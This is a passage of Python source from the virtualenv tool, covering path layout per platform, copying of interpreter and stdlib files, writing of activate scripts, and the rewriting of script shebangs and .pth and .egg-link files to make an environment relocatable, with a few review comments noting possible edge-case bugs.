    Returns ``(home_dir, lib_dir, inc_dir, bin_dir)``; the layout differs
    per platform (Windows / Jython / PyPy / POSIX CPython).
    """
    # XXX: We'd use distutils.sysconfig.get_python_inc/lib but its
    # prefix arg is broken: http://bugs.python.org/issue3386
    if is_win:
        # Windows has lots of problems with executables with spaces in
        # the name; this function will remove them (using the ~1
        # format):
        mkdir(home_dir)
        if ' ' in home_dir:
            import ctypes
            GetShortPathName = ctypes.windll.kernel32.GetShortPathNameW
            size = max(len(home_dir)+1, 256)
            buf = ctypes.create_unicode_buffer(size)
            try:
                # Python 2 has unicode(); Python 3 uses str for the same
                u = unicode
            except NameError:
                u = str
            ret = GetShortPathName(u(home_dir), buf, size)
            if not ret:
                print('Error: the path "%s" has a space in it' % home_dir)
                print('We could not determine the short pathname for it.')
                print('Exiting.')
                sys.exit(3)
            home_dir = str(buf.value)
        lib_dir = join(home_dir, 'Lib')
        inc_dir = join(home_dir, 'Include')
        bin_dir = join(home_dir, 'Scripts')
    if is_jython:
        lib_dir = join(home_dir, 'Lib')
        inc_dir = join(home_dir, 'Include')
        bin_dir = join(home_dir, 'bin')
    elif is_pypy:
        lib_dir = home_dir
        inc_dir = join(home_dir, 'include')
        bin_dir = join(home_dir, 'bin')
    elif not is_win:
        lib_dir = join(home_dir, 'lib', py_version)
        multiarch_exec = '/usr/bin/multiarch-platform'
        if is_executable_file(multiarch_exec):
            # In Mageia (2) and Mandriva distros the include dir must be like:
            # virtualenv/include/multiarch-x86_64-linux/python2.7
            # instead of being virtualenv/include/python2.7
            p = subprocess.Popen(multiarch_exec, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            stdout, stderr = p.communicate()
            # stdout.strip is needed to remove newline character
            inc_dir = join(home_dir, 'include', stdout.strip(), py_version + abiflags)
        else:
            inc_dir = join(home_dir, 'include', py_version + abiflags)
        bin_dir = join(home_dir, 'bin')
    return home_dir, lib_dir, inc_dir, bin_dir
def change_prefix(filename, dst_prefix):
    """Rebase ``filename`` from whichever known interpreter prefix it lives
    under onto ``dst_prefix``; asserts if it matches none of them."""
    prefixes = [sys.prefix]

    if is_darwin:
        # macOS system/user Pythons scatter site-packages in extra places
        prefixes.extend((
            os.path.join("/Library/Python", sys.version[:3], "site-packages"),
            os.path.join(sys.prefix, "Extras", "lib", "python"),
            os.path.join("~", "Library", "Python", sys.version[:3], "site-packages"),
            # Python 2.6 no-frameworks
            os.path.join("~", ".local", "lib","python", sys.version[:3], "site-packages"),
            # System Python 2.7 on OSX Mountain Lion
            os.path.join("~", "Library", "Python", sys.version[:3], "lib", "python", "site-packages")))

    if hasattr(sys, 'real_prefix'):
        prefixes.append(sys.real_prefix)
    if hasattr(sys, 'base_prefix'):
        prefixes.append(sys.base_prefix)
    prefixes = list(map(os.path.expanduser, prefixes))
    prefixes = list(map(os.path.abspath, prefixes))
    # Check longer prefixes first so we don't split in the middle of a filename
    prefixes = sorted(prefixes, key=len, reverse=True)
    filename = os.path.abspath(filename)
    # NOTE(review): startswith() does not require a path-separator boundary,
    # so '/usr/local-x' would match prefix '/usr/local' — confirm acceptable.
    for src_prefix in prefixes:
        if filename.startswith(src_prefix):
            _, relpath = filename.split(src_prefix, 1)
            if src_prefix != os.sep: # sys.prefix == "/"
                assert relpath[0] == os.sep
                relpath = relpath[1:]
            return join(dst_prefix, relpath)
    assert False, "Filename %s does not start with any of these prefixes: %s" % \
        (filename, prefixes)
def copy_required_modules(dst_prefix, symlink):
    """Copy (or symlink) each REQUIRED_MODULES bootstrap module from the
    running interpreter's stdlib into the new environment at ``dst_prefix``."""
    import imp
    # If we are running under -p, we need to remove the current
    # directory from sys.path temporarily here, so that we
    # definitely get the modules from the site directory of
    # the interpreter we are running under, not the one
    # virtualenv.py is installed under (which might lead to py2/py3
    # incompatibility issues)
    _prev_sys_path = sys.path
    if os.environ.get('VIRTUALENV_INTERPRETER_RUNNING'):
        sys.path = sys.path[1:]
    try:
        for modname in REQUIRED_MODULES:
            if modname in sys.builtin_module_names:
                logger.info("Ignoring built-in bootstrap module: %s" % modname)
                continue
            try:
                f, filename, _ = imp.find_module(modname)
            except ImportError:
                logger.info("Cannot import bootstrap module: %s" % modname)
            else:
                if f is not None:
                    f.close()
                # special-case custom readline.so on OS X, but not for pypy:
                if modname == 'readline' and sys.platform == 'darwin' and not (
                    is_pypy or filename.endswith(join('lib-dynload', 'readline.so'))):
                    dst_filename = join(dst_prefix, 'lib', 'python%s' % sys.version[:3], 'readline.so')
                elif modname == 'readline' and sys.platform == 'win32':
                    # special-case for Windows, where readline is not a
                    # standard module, though it may have been installed in
                    # site-packages by a third-party package
                    # NOTE(review): this 'pass' leaves dst_filename holding
                    # the value from a previous iteration (or unbound on the
                    # first) before the copyfile() below — confirm intended.
                    pass
                else:
                    dst_filename = change_prefix(filename, dst_prefix)
                copyfile(filename, dst_filename, symlink)
                if filename.endswith('.pyc'):
                    # also carry over the matching .py source when present
                    pyfile = filename[:-1]
                    if os.path.exists(pyfile):
                        copyfile(pyfile, dst_filename[:-1], symlink)
    finally:
        sys.path = _prev_sys_path
def subst_path(prefix_path, prefix, home_dir):
    """Rebase *prefix_path* from *prefix* onto *home_dir*.

    All three paths are normalized first.  Returns None (after a warning)
    when *prefix_path* does not actually live under *prefix*.
    """
    norm_path = os.path.normpath(prefix_path)
    norm_prefix = os.path.normpath(prefix)
    norm_home = os.path.normpath(home_dir)
    if not norm_path.startswith(norm_prefix):
        logger.warn('Path not in prefix %r %r', norm_path, norm_prefix)
        return None
    return norm_path.replace(norm_prefix, norm_home, 1)
def install_python(home_dir, lib_dir, inc_dir, bin_dir, site_packages, clear, symlink=True):
    """Install just the base environment, no distutils patches etc.

    Copies (or symlinks) the interpreter, the minimal stdlib bootstrap
    files/modules, the custom site.py, and the include directories into the
    new environment, then sanity-checks the new executable by running it and
    comparing its reported sys.prefix against home_dir.

    Returns the path of the environment's python executable.
    """
    if sys.executable.startswith(bin_dir):
        print('Please use the *system* python to run this script')
        return
    if clear:
        # --clear only wipes lib_dir; bin_dir is intentionally left alone.
        rmtree(lib_dir)
        ## FIXME: why not delete it?
        ## Maybe it should delete everything with #!/path/to/venv/python in it
        logger.notify('Not deleting %s', bin_dir)
    # Resolve the base interpreter's prefix: real_prefix / base_prefix take
    # precedence over sys.prefix when present (i.e. when already running
    # inside another environment).
    if hasattr(sys, 'real_prefix'):
        logger.notify('Using real prefix %r' % sys.real_prefix)
        prefix = sys.real_prefix
    elif hasattr(sys, 'base_prefix'):
        logger.notify('Using base prefix %r' % sys.base_prefix)
        prefix = sys.base_prefix
    else:
        prefix = sys.prefix
    mkdir(lib_dir)
    fix_lib64(lib_dir, symlink)
    # Candidate directories holding the stdlib files we need to copy/link.
    stdlib_dirs = [os.path.dirname(os.__file__)]
    if is_win:
        stdlib_dirs.append(join(os.path.dirname(stdlib_dirs[0]), 'DLLs'))
    elif is_darwin:
        stdlib_dirs.append(join(stdlib_dirs[0], 'site-packages'))
    if hasattr(os, 'symlink'):
        logger.info('Symlinking Python bootstrap modules')
    else:
        logger.info('Copying Python bootstrap modules')
    logger.indent += 2
    try:
        # copy required files...
        for stdlib_dir in stdlib_dirs:
            if not os.path.isdir(stdlib_dir):
                continue
            for fn in os.listdir(stdlib_dir):
                bn = os.path.splitext(fn)[0]
                if fn != 'site-packages' and bn in REQUIRED_FILES:
                    copyfile(join(stdlib_dir, fn), join(lib_dir, fn), symlink)
        # ...and modules
        copy_required_modules(home_dir, symlink)
    finally:
        logger.indent -= 2
    mkdir(join(lib_dir, 'site-packages'))
    # Install the customized site.py plus the marker files it reads
    # (orig-prefix.txt and, optionally, no-global-site-packages.txt).
    import site
    site_filename = site.__file__
    if site_filename.endswith('.pyc'):
        site_filename = site_filename[:-1]
    elif site_filename.endswith('$py.class'):
        # Jython compiles modules to $py.class files.
        site_filename = site_filename.replace('$py.class', '.py')
    site_filename_dst = change_prefix(site_filename, home_dir)
    site_dir = os.path.dirname(site_filename_dst)
    writefile(site_filename_dst, SITE_PY)
    writefile(join(site_dir, 'orig-prefix.txt'), prefix)
    site_packages_filename = join(site_dir, 'no-global-site-packages.txt')
    if not site_packages:
        writefile(site_packages_filename, '')
    # Copy/symlink the C header directories.
    if is_pypy or is_win:
        stdinc_dir = join(prefix, 'include')
    else:
        stdinc_dir = join(prefix, 'include', py_version + abiflags)
    if os.path.exists(stdinc_dir):
        copyfile(stdinc_dir, inc_dir, symlink)
    else:
        logger.debug('No include dir %s' % stdinc_dir)
    platinc_dir = distutils.sysconfig.get_python_inc(plat_specific=1)
    if platinc_dir != stdinc_dir:
        platinc_dest = distutils.sysconfig.get_python_inc(
            plat_specific=1, prefix=home_dir)
        if platinc_dir == platinc_dest:
            # Do platinc_dest manually due to a CPython bug;
            # not http://bugs.python.org/issue3386 but a close cousin
            platinc_dest = subst_path(platinc_dir, prefix, home_dir)
        if platinc_dest:
            # PyPy's stdinc_dir and prefix are relative to the original binary
            # (traversing virtualenvs), whereas the platinc_dir is relative to
            # the inner virtualenv and ignores the prefix argument.
            # This seems more evolved than designed.
            copyfile(platinc_dir, platinc_dest, symlink)
    # pypy never uses exec_prefix, just ignore it
    if sys.exec_prefix != prefix and not is_pypy:
        if is_win:
            exec_dir = join(sys.exec_prefix, 'lib')
        elif is_jython:
            exec_dir = join(sys.exec_prefix, 'Lib')
        else:
            exec_dir = join(sys.exec_prefix, 'lib', py_version)
        for fn in os.listdir(exec_dir):
            copyfile(join(exec_dir, fn), join(lib_dir, fn), symlink)
    if is_jython:
        # Jython has either jython-dev.jar and javalib/ dir, or just
        # jython.jar
        for name in 'jython-dev.jar', 'javalib', 'jython.jar':
            src = join(prefix, name)
            if os.path.exists(src):
                copyfile(src, join(home_dir, name), symlink)
        # XXX: registry should always exist after Jython 2.5rc1
        src = join(prefix, 'registry')
        if os.path.exists(src):
            copyfile(src, join(home_dir, 'registry'), symlink=False)
        copyfile(join(prefix, 'cachedir'), join(home_dir, 'cachedir'),
                 symlink=False)
    mkdir(bin_dir)
    py_executable = join(bin_dir, os.path.basename(sys.executable))
    if 'Python.framework' in prefix:
        # OS X framework builds cause validation to break
        # https://github.com/pypa/virtualenv/issues/322
        if os.environ.get('__PYVENV_LAUNCHER__'):
            del os.environ["__PYVENV_LAUNCHER__"]
        if re.search(r'/Python(?:-32|-64)*$', py_executable):
            # The name of the python executable is not quite what
            # we want, rename it.
            py_executable = os.path.join(
                os.path.dirname(py_executable), 'python')
    logger.notify('New %s executable in %s', expected_exe, py_executable)
    # When running a Windows source build, the *.pyd files live in the build
    # directory; link to them with a .pth file (and clean it up otherwise).
    pcbuild_dir = os.path.dirname(sys.executable)
    pyd_pth = os.path.join(lib_dir, 'site-packages', 'virtualenv_builddir_pyd.pth')
    if is_win and os.path.exists(os.path.join(pcbuild_dir, 'build.bat')):
        logger.notify('Detected python running from build directory %s', pcbuild_dir)
        logger.notify('Writing .pth file linking to build directory for *.pyd files')
        writefile(pyd_pth, pcbuild_dir)
    else:
        pcbuild_dir = None
        if os.path.exists(pyd_pth):
            logger.info('Deleting %s (not Windows env or not build directory python)' % pyd_pth)
            os.unlink(pyd_pth)
    if sys.executable != py_executable:
        ## FIXME: could I just hard link?
        executable = sys.executable
        shutil.copyfile(executable, py_executable)
        make_exe(py_executable)
        if is_win or is_cygwin:
            # Mirror pythonw.exe / python_d.exe and the matching DLLs next to
            # the copied interpreter so Windows loads the right runtime.
            pythonw = os.path.join(os.path.dirname(sys.executable), 'pythonw.exe')
            if os.path.exists(pythonw):
                logger.info('Also created pythonw.exe')
                shutil.copyfile(pythonw, os.path.join(os.path.dirname(py_executable), 'pythonw.exe'))
            python_d = os.path.join(os.path.dirname(sys.executable), 'python_d.exe')
            python_d_dest = os.path.join(os.path.dirname(py_executable), 'python_d.exe')
            if os.path.exists(python_d):
                logger.info('Also created python_d.exe')
                shutil.copyfile(python_d, python_d_dest)
            elif os.path.exists(python_d_dest):
                logger.info('Removed python_d.exe as it is no longer at the source')
                os.unlink(python_d_dest)
            # we need to copy the DLL to enforce that windows will load the correct one.
            # may not exist if we are cygwin.
            py_executable_dll = 'python%s%s.dll' % (
                sys.version_info[0], sys.version_info[1])
            py_executable_dll_d = 'python%s%s_d.dll' % (
                sys.version_info[0], sys.version_info[1])
            pythondll = os.path.join(os.path.dirname(sys.executable), py_executable_dll)
            pythondll_d = os.path.join(os.path.dirname(sys.executable), py_executable_dll_d)
            pythondll_d_dest = os.path.join(os.path.dirname(py_executable), py_executable_dll_d)
            if os.path.exists(pythondll):
                logger.info('Also created %s' % py_executable_dll)
                shutil.copyfile(pythondll, os.path.join(os.path.dirname(py_executable), py_executable_dll))
            if os.path.exists(pythondll_d):
                logger.info('Also created %s' % py_executable_dll_d)
                shutil.copyfile(pythondll_d, pythondll_d_dest)
            elif os.path.exists(pythondll_d_dest):
                logger.info('Removed %s as the source does not exist' % pythondll_d_dest)
                os.unlink(pythondll_d_dest)
        if is_pypy:
            # make a symlink python --> pypy-c
            python_executable = os.path.join(os.path.dirname(py_executable), 'python')
            if sys.platform in ('win32', 'cygwin'):
                python_executable += '.exe'
            logger.info('Also created executable %s' % python_executable)
            copyfile(py_executable, python_executable, symlink)
            if is_win:
                for name in ['libexpat.dll', 'libpypy.dll', 'libpypy-c.dll',
                             'libeay32.dll', 'ssleay32.dll', 'sqlite3.dll',
                             'tcl85.dll', 'tk85.dll']:
                    src = join(prefix, name)
                    if os.path.exists(src):
                        copyfile(src, join(bin_dir, name), symlink)
            # Locate PyPy's lib_pypy directory on sys.path and bring it over;
            # the for/else fires only when no entry matched.
            for d in sys.path:
                if d.endswith('lib_pypy'):
                    break
            else:
                logger.fatal('Could not find lib_pypy in sys.path')
                raise SystemExit(3)
            logger.info('Copying lib_pypy')
            copyfile(d, os.path.join(home_dir, 'lib_pypy'), symlink)
    if os.path.splitext(os.path.basename(py_executable))[0] != expected_exe:
        secondary_exe = os.path.join(os.path.dirname(py_executable),
                                     expected_exe)
        py_executable_ext = os.path.splitext(py_executable)[1]
        if py_executable_ext.lower() == '.exe':
            # python2.4 gives an extension of '.4' :P
            secondary_exe += py_executable_ext
        if os.path.exists(secondary_exe):
            logger.warn('Not overwriting existing %s script %s (you must use %s)'
                        % (expected_exe, secondary_exe, py_executable))
        else:
            logger.notify('Also creating executable in %s' % secondary_exe)
            shutil.copyfile(sys.executable, secondary_exe)
            make_exe(secondary_exe)
    if '.framework' in prefix:
        if 'Python.framework' in prefix:
            logger.debug('MacOSX Python framework detected')
            # Make sure we use the embedded interpreter inside
            # the framework, even if sys.executable points to
            # the stub executable in ${sys.prefix}/bin
            # See http://groups.google.com/group/python-virtualenv/
            # browse_thread/thread/17cab2f85da75951
            original_python = os.path.join(
                prefix, 'Resources/Python.app/Contents/MacOS/Python')
        if 'EPD' in prefix:
            logger.debug('EPD framework detected')
            original_python = os.path.join(prefix, 'bin/python')
        shutil.copy(original_python, py_executable)
        # Copy the framework's dylib into the virtual
        # environment
        virtual_lib = os.path.join(home_dir, '.Python')
        if os.path.exists(virtual_lib):
            os.unlink(virtual_lib)
        copyfile(
            os.path.join(prefix, 'Python'),
            virtual_lib,
            symlink)
        # And then change the install_name of the copied python executable
        try:
            mach_o_change(py_executable,
                          os.path.join(prefix, 'Python'),
                          '@executable_path/../.Python')
        except:
            e = sys.exc_info()[1]
            logger.warn("Could not call mach_o_change: %s. "
                        "Trying to call install_name_tool instead." % e)
            try:
                call_subprocess(
                    ["install_name_tool", "-change",
                     os.path.join(prefix, 'Python'),
                     '@executable_path/../.Python',
                     py_executable])
            except:
                logger.fatal("Could not call install_name_tool -- you must "
                             "have Apple's development tools installed")
                raise
    if not is_win:
        # Ensure that 'python', 'pythonX' and 'pythonX.Y' all exist
        py_exe_version_major = 'python%s' % sys.version_info[0]
        py_exe_version_major_minor = 'python%s.%s' % (
            sys.version_info[0], sys.version_info[1])
        py_exe_no_version = 'python'
        required_symlinks = [ py_exe_no_version, py_exe_version_major,
                         py_exe_version_major_minor ]
        py_executable_base = os.path.basename(py_executable)
        if py_executable_base in required_symlinks:
            # Don't try to symlink to yourself.
            required_symlinks.remove(py_executable_base)
        for pth in required_symlinks:
            full_pth = join(bin_dir, pth)
            if os.path.exists(full_pth):
                os.unlink(full_pth)
            if symlink:
                os.symlink(py_executable_base, full_pth)
            else:
                copyfile(py_executable, full_pth, symlink)
    if is_win and ' ' in py_executable:
        # There's a bug with subprocess on Windows when using a first
        # argument that has a space in it. Instead we have to quote
        # the value:
        py_executable = '"%s"' % py_executable
    # NOTE: keep this check as one line, cmd.exe doesn't cope with line breaks
    cmd = [py_executable, '-c', 'import sys;out=sys.stdout;'
        'getattr(out, "buffer", out).write(sys.prefix.encode("utf-8"))']
    logger.info('Testing executable with %s %s "%s"' % tuple(cmd))
    try:
        proc = subprocess.Popen(cmd,
                                stdout=subprocess.PIPE)
        proc_stdout, proc_stderr = proc.communicate()
    except OSError:
        e = sys.exc_info()[1]
        if e.errno == errno.EACCES:
            logger.fatal('ERROR: The executable %s could not be run: %s' % (py_executable, e))
            sys.exit(100)
        else:
            raise e
    proc_stdout = proc_stdout.strip().decode("utf-8")
    proc_stdout = os.path.normcase(os.path.abspath(proc_stdout))
    norm_home_dir = os.path.normcase(os.path.abspath(home_dir))
    if hasattr(norm_home_dir, 'decode'):
        norm_home_dir = norm_home_dir.decode(sys.getfilesystemencoding())
    if proc_stdout != norm_home_dir:
        logger.fatal(
            'ERROR: The executable %s is not functioning' % py_executable)
        logger.fatal(
            'ERROR: It thinks sys.prefix is %r (should be %r)'
            % (proc_stdout, norm_home_dir))
        logger.fatal(
            'ERROR: virtualenv is not compatible with this system or executable')
        if is_win:
            logger.fatal(
                'Note: some Windows users have reported this error when they '
                'installed Python for "Only this user" or have multiple '
                'versions of Python installed. Copying the appropriate '
                'PythonXX.dll to the virtualenv Scripts/ directory may fix '
                'this problem.')
        sys.exit(100)
    else:
        logger.info('Got sys.prefix result: %r' % proc_stdout)
    pydistutils = os.path.expanduser('~/.pydistutils.cfg')
    if os.path.exists(pydistutils):
        logger.notify('Please make sure you remove any previous custom paths from '
                      'your %s file.' % pydistutils)
    ## FIXME: really this should be calculated earlier
    fix_local_scheme(home_dir, symlink)
    if site_packages:
        if os.path.exists(site_packages_filename):
            logger.info('Deleting %s' % site_packages_filename)
            os.unlink(site_packages_filename)
    return py_executable
def install_activate(home_dir, bin_dir, prompt=None):
    """Write the activate/deactivate helper scripts into *bin_dir*,
    substituting the environment's paths and prompt into the embedded
    templates (ACTIVATE_SH and friends)."""
    home_dir = os.path.abspath(home_dir)
    if is_win or is_jython and os._name == 'nt':
        files = {
            'activate.bat': ACTIVATE_BAT,
            'deactivate.bat': DEACTIVATE_BAT,
            'activate.ps1': ACTIVATE_PS,
        }
        # MSYS needs paths of the form /c/path/to/file
        drive, tail = os.path.splitdrive(home_dir.replace(os.sep, '/'))
        home_dir_msys = (drive and "/%s%s" or "%s%s") % (drive[:1], tail)
        # Run-time conditional enables (basic) Cygwin compatibility
        home_dir_sh = ("""$(if [ "$OSTYPE" "==" "cygwin" ]; then cygpath -u '%s'; else echo '%s'; fi;)""" %
                       (home_dir, home_dir_msys))
        files['activate'] = ACTIVATE_SH.replace('__VIRTUAL_ENV__', home_dir_sh)
    else:
        # POSIX shells: bash/sh plus the fish and csh/tcsh variants.
        files = {
            'activate': ACTIVATE_SH,
            'activate.fish': ACTIVATE_FISH,
            'activate.csh': ACTIVATE_CSH,
        }
    files['activate_this.py'] = ACTIVATE_THIS
    if hasattr(home_dir, 'decode'):
        home_dir = home_dir.decode(sys.getfilesystemencoding())
    vname = os.path.basename(home_dir)
    # Placeholder substitutions applied, in order, to every template.
    substitutions = [
        ('__VIRTUAL_PROMPT__', prompt or ''),
        ('__VIRTUAL_WINPROMPT__', prompt or '(%s)' % vname),
        ('__VIRTUAL_ENV__', home_dir),
        ('__VIRTUAL_NAME__', vname),
        ('__BIN_NAME__', os.path.basename(bin_dir)),
    ]
    for name, content in files.items():
        for marker, value in substitutions:
            content = content.replace(marker, value)
        writefile(os.path.join(bin_dir, name), content)
def install_distutils(home_dir):
    """Write the embedded distutils package (DISTUTILS_INIT as __init__.py)
    and a distutils.cfg (DISTUTILS_CFG, kept if one already exists) into the
    environment's distutils directory."""
    distutils_path = change_prefix(distutils.__path__[0], home_dir)
    mkdir(distutils_path)
    ## FIXME: maybe this prefix setting should only be put in place if
    ## there's a local distutils.cfg with a prefix setting?
    home_dir = os.path.abspath(home_dir)
    ## FIXME: this is breaking things, removing for now:
    #distutils_cfg = DISTUTILS_CFG + "\n[install]\nprefix=%s\n" % home_dir
    writefile(os.path.join(distutils_path, '__init__.py'), DISTUTILS_INIT)
    writefile(os.path.join(distutils_path, 'distutils.cfg'), DISTUTILS_CFG, overwrite=False)
def fix_local_scheme(home_dir, symlink=True):
    """
    Platforms that use the "posix_local" install scheme (like Ubuntu with
    Python 2.7) need to be given an additional "local" location, sigh.
    """
    try:
        import sysconfig
    except ImportError:
        return
    # NOTE(review): relies on the private sysconfig._get_default_scheme().
    if sysconfig._get_default_scheme() != 'posix_local':
        return
    local_path = os.path.join(home_dir, 'local')
    if os.path.exists(local_path):
        return
    os.mkdir(local_path)
    for subdir_name in os.listdir(home_dir):
        if subdir_name == 'local':
            continue
        copyfile(os.path.abspath(os.path.join(home_dir, subdir_name)),
                 os.path.join(local_path, subdir_name), symlink)
def fix_lib64(lib_dir, symlink=True):
    """
    Some platforms (particularly Gentoo on x64) put things in lib64/pythonX.Y
    instead of lib/pythonX.Y. If this is such a platform we'll just create a
    symlink so lib64 points to lib
    """
    uses_lib64 = any(isinstance(value, basestring) and 'lib64' in value
                     for value in distutils.sysconfig.get_config_vars().values())
    if not uses_lib64:
        return
    # PyPy's library path scheme is not affected by this.
    # Return early or we will die on the following assert.
    if is_pypy:
        logger.debug('PyPy detected, skipping lib64 symlinking')
        return
    logger.debug('This system uses lib64; symlinking lib64 to lib')
    assert os.path.basename(lib_dir) == 'python%s' % sys.version[:3], (
        "Unexpected python lib dir: %r" % lib_dir)
    lib_parent = os.path.dirname(lib_dir)
    assert os.path.basename(lib_parent) == 'lib', (
        "Unexpected parent dir: %r" % lib_parent)
    top_level = os.path.dirname(lib_parent)
    lib64_link = os.path.join(top_level, 'lib64')
    if os.path.lexists(lib64_link):
        return
    if symlink:
        os.symlink('lib', lib64_link)
    else:
        copyfile('lib', lib64_link)
def resolve_interpreter(exe):
    """
    If the executable given isn't an absolute path, search $PATH for the
    interpreter.  A bare version number (e.g. '2.7') is first mapped to the
    installed interpreter for that version.  Exits with status 3 when the
    result does not exist or is not executable.
    """
    versions = get_installed_pythons()
    if exe in versions:
        exe = versions[exe]
    if os.path.abspath(exe) != exe:
        for directory in os.environ.get('PATH', '').split(os.pathsep):
            candidate = os.path.join(directory, exe)
            if os.path.exists(candidate):
                exe = candidate
                break
    if not os.path.exists(exe):
        logger.fatal('The executable %s (from --python=%s) does not exist' % (exe, exe))
        raise SystemExit(3)
    if not is_executable(exe):
        logger.fatal('The executable %s (from --python=%s) is not executable' % (exe, exe))
        raise SystemExit(3)
    return exe
def is_executable(exe):
    """Return True if the current user may execute the file at *exe*."""
    can_execute = os.access(exe, os.X_OK)
    return can_execute
############################################################
## Relocating the environment:
def make_environment_relocatable(home_dir):
    """
    Makes the already-existing environment use relative paths, and takes out
    the #!-based environment selection in scripts.
    """
    home_dir, lib_dir, inc_dir, bin_dir = path_locations(home_dir)
    activate_this = os.path.join(bin_dir, 'activate_this.py')
    if not os.path.exists(activate_this):
        logger.fatal(
            'The environment doesn\'t have a file %s -- please re-run virtualenv '
            'on this environment to update it' % activate_this)
        # BUG FIX: execution previously fell through after the fatal message
        # and tried to fix up scripts in a broken environment; abort instead,
        # matching the logger.fatal + SystemExit pattern used elsewhere.
        raise SystemExit(3)
    fixup_scripts(home_dir, bin_dir)
    fixup_pth_and_egg_link(home_dir)
    ## FIXME: need to fix up distutils.cfg
# Scripts whose absolute-path shebangs are expected and must not be rewritten
# by fixup_scripts (the interpreter itself and the activation helpers).
OK_ABS_SCRIPTS = ['python', 'python%s' % sys.version[:3],
                  'activate', 'activate.bat', 'activate_this.py',
                  'activate.fish', 'activate.csh']
def fixup_scripts(home_dir, bin_dir):
    """Rewrite the shebang of every script in *bin_dir* to the relocatable
    '#!/usr/bin/env pythonX.Y' form (COMSPEC stub on Windows) and splice in
    the activate_this.py bootstrap via relative_script().  Binary files,
    empty files, and scripts listed in OK_ABS_SCRIPTS are skipped."""
    if is_win:
        new_shebang_args = (
            '%s /c' % os.path.normcase(os.environ.get('COMSPEC', 'cmd.exe')),
            '', '.exe')
    else:
        new_shebang_args = ('/usr/bin/env', sys.version[:3], '')
    # This is what we expect at the top of scripts:
    shebang = '#!%s' % os.path.normcase(os.path.join(
        os.path.abspath(bin_dir), 'python%s' % new_shebang_args[2]))
    # This is what we'll put:
    new_shebang = '#!%s python%s%s' % new_shebang_args
    for filename in os.listdir(bin_dir):
        filename = os.path.join(bin_dir, filename)
        if not os.path.isfile(filename):
            # ignore subdirs, e.g. .svn ones.
            continue
        f = open(filename, 'rb')
        try:
            try:
                lines = f.read().decode('utf-8').splitlines()
            except UnicodeDecodeError:
                # This is probably a binary program instead
                # of a script, so just ignore it.
                continue
        finally:
            f.close()
        if not lines:
            logger.warn('Script %s is an empty file' % filename)
            continue
        old_shebang = lines[0].strip()
        # normcase everything after the '#!' so the comparison below is
        # case-insensitive on case-insensitive filesystems.
        old_shebang = old_shebang[0:2] + os.path.normcase(old_shebang[2:])
        if not old_shebang.startswith(shebang):
            if os.path.basename(filename) in OK_ABS_SCRIPTS:
                logger.debug('Cannot make script %s relative' % filename)
            elif lines[0].strip() == new_shebang:
                logger.info('Script %s has already been made relative' % filename)
            else:
                logger.warn('Script %s cannot be made relative (it\'s not a normal script that starts with %s)'
                            % (filename, shebang))
            continue
        logger.notify('Making script %s relative' % filename)
        script = relative_script([new_shebang] + lines[1:])
        f = open(filename, 'wb')
        f.write('\n'.join(script).encode('utf-8'))
        f.close()
def relative_script(lines):
    """Return a script that'll work in a relocatable environment: the
    activate_this.py bootstrap line is inserted after the shebang (and after
    any ``from __future__ import`` statements, which must come first)."""
    activate = "import os; activate_this=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'activate_this.py'); exec(compile(open(activate_this).read(), activate_this, 'exec'), dict(__file__=activate_this)); del os, activate_this"
    insert_at = 1  # default: right after the shebang line
    # Scan backwards so we land after the *last* future statement; inserting
    # before one would be a SyntaxError.
    for idx in range(len(lines) - 1, -1, -1):
        if lines[idx].split()[:3] == ['from', '__future__', 'import']:
            insert_at = idx + 1
            break
    return lines[:insert_at] + ['', activate, ''] + lines[insert_at:]
def fixup_pth_and_egg_link(home_dir, sys_path=None):
    """Makes .pth and .egg-link files inside the environment use relative
    paths.  Directories on *sys_path* (default: sys.path) outside *home_dir*
    and files that are not writable are skipped."""
    home_dir = os.path.normcase(os.path.abspath(home_dir))
    if sys_path is None:
        sys_path = sys.path
    for entry in sys_path:
        entry = entry or '.'
        if not os.path.isdir(entry):
            continue
        entry = os.path.normcase(os.path.abspath(entry))
        if not entry.startswith(home_dir):
            logger.debug('Skipping system (non-environment) directory %s' % entry)
            continue
        for name in os.listdir(entry):
            full = os.path.join(entry, name)
            if full.endswith('.pth'):
                if os.access(full, os.W_OK):
                    fixup_pth_file(full)
                else:
                    logger.warn('Cannot write .pth file %s, skipping' % full)
            if full.endswith('.egg-link'):
                if os.access(full, os.W_OK):
                    fixup_egg_link(full)
                else:
                    logger.warn('Cannot write .egg-link file %s, skipping' % full)
def fixup_pth_file(filename):
    """Rewrite absolute path entries in a .pth file as paths relative to it.

    Blank lines, comments, ``import ...`` lines and non-absolute entries are
    kept (stripped) as-is.
    """
    with open(filename) as f:
        original_lines = f.readlines()
    new_lines = []
    for raw in original_lines:
        entry = raw.strip()
        if (not entry or entry.startswith('#') or entry.startswith('import ')
                or os.path.abspath(entry) != entry):
            new_lines.append(entry)
            continue
        relative = make_relative_path(filename, entry)
        if entry != relative:
            logger.debug('Rewriting path %s as %s (in %s)' % (entry, relative, filename))
        new_lines.append(relative)
    # NOTE: raw lines keep their trailing newlines while new_lines are
    # stripped, so this comparison mirrors the original behavior exactly.
    if new_lines == original_lines:
        logger.info('No changes to .pth file %s' % filename)
        return
    logger.notify('Making paths in .pth file %s relative' % filename)
    with open(filename, 'w') as f:
        f.write('\n'.join(new_lines) + '\n')
def fixup_egg_link(filename):
    """Rewrite the absolute path on the first line of an .egg-link file as a
    path relative to the file; already-relative links are left alone."""
    with open(filename) as f:
        link = f.readline().strip()
    if os.path.abspath(link) != link:
        logger.debug('Link in %s already relative' % filename)
        return
    new_link = make_relative_path(filename, link)
    logger.notify('Rewriting link %s in %s as %s' % (link, filename, new_link))
    with open(filename, 'w') as f:
        f.write(new_link)
def make_relative_path(source, dest, dest_is_directory=True):
    """
    Make a filename relative, where the filename is dest, and it is
    being referred to from the filename source.

    >>> make_relative_path('/usr/share/something/a-file.pth',
    ...                    '/usr/share/another-place/src/Directory')
    '../another-place/src/Directory'
    >>> make_relative_path('/usr/share/something/a-file.pth',
    ...                    '/home/user/src/Directory')
    '../../../home/user/src/Directory'
    >>> make_relative_path('/usr/share/a-file.pth', '/usr/share/')
    './'
    """
    base = os.path.dirname(source)
    target = dest
    target_filename = None
    if not dest_is_directory:
        target_filename = os.path.basename(target)
        target = os.path.dirname(target)
    target = os.path.normpath(os.path.abspath(target))
    base = os.path.normpath(os.path.abspath(base))
    target_parts = target.strip(os.path.sep).split(os.path.sep)
    base_parts = base.strip(os.path.sep).split(os.path.sep)
    # Drop the common ancestor components from both sides.
